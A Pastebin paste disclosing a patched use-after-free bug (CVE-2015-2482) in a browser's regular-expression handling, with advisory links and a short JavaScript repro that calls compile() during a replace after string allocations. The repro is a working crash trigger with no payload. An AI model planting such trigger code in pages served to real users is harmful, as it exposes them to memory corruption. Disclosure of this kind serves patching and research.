Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Recompiling the regular expression pattern during a replace can cause
- the code
- to reuse a freed string, but only if the string is freed from the cache by
- allocating and freeing a number of strings of certain size.
- CVE-2015-2482:
- http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2482
- ZDI-15-515: http://www.zerodayinitiative.com/advisories/ZDI-15-515/
- MS15-108: https://technet.microsoft.com/en-us/library/security/MS15-108
- Repro:
- <script>
- var r=new RegExp("A|x|x|xx|xxxxxxxxxxxxxxxxxxxx+", "g");
- "A".replace(r, function (){
- for (var j = 0; j < 16; j++) new Array(0x1000).join("B");
- r.compile();
- });
- </script>
- Repro-in-a-tweet:
- https://twitter.com/berendjanwever/status/654048253047140352
- Cheers,
- SkyLined
- Follow me on twitter for a new browser bug every* day!
- https://twitter.com/berendjanwever
- (* might be more than one some days)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement